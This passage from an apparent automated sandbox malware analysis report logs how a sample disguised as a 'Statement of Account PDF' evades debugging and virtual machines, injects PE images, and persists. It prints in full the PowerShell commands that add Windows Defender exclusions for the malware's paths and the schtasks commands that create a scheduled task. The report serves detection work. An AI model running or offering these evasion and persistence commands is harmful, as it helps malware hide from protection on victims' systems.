                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198136
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198027
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197918
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197808
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197691
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197558
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197415
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197257
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197142
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196894
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196150
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196023
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195621
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195511
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195402
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195292
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195183
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195072
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1194961
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99762
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99641
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99531
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99422
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99313
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99156
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99046
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98937
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98712
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98594
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98484
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98375
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98266
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98141
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98016
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97906
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97797
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97687
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97578
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97469
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97359
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97250
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97135
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199949
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199718
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199609
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199498
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199390
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199281
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199170
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199062
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198953
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198843
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198734
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198624
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198515
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198406
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198295
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198187
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198078
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197968
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197856
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197734
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197625
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197515
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197406
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99637
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99531
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99422
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99313
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99188
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 99063
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98953
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98844
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98610
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98485
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98329
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98154
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 98042
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97723
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97594
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97485
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97358
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 97163
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199951
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199839
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199609
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199473
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199335
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199219
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199105
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198956
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198411
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198281
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198172
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198062
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197953
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197844
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197734
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197621
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197500
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197391
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197276
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197156
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197047
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196936
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196594
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196484
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196375
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BjTxJte.exe_f5c09dd75b90d612af8c658c8837992c387ee89_843aacda_4690c535-c6af-41e6-8128-f3000ded106c\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_gDdsxauPhk.exe_e2c8de6e9dfbc3bf198524a8a8bae3ea56c2edb2_cb724c00_6c828731-bc0c-4d10-93b3-5ed4934f0644\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
                      Source: BjTxJte.exe, 00000016.00000002.1923322227.0000000001709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                      Source: BjTxJte.exe, 00000012.00000002.1852257669.00000000010B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4077118774.0000000000D8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeMemory written: C:\Users\user\Desktop\Statement of Account PDF.bat.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeMemory written: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMemory written: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Users\user\Desktop\Statement of Account PDF.bat.exe "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp"
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Users\user\Desktop\Statement of Account PDF.bat.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
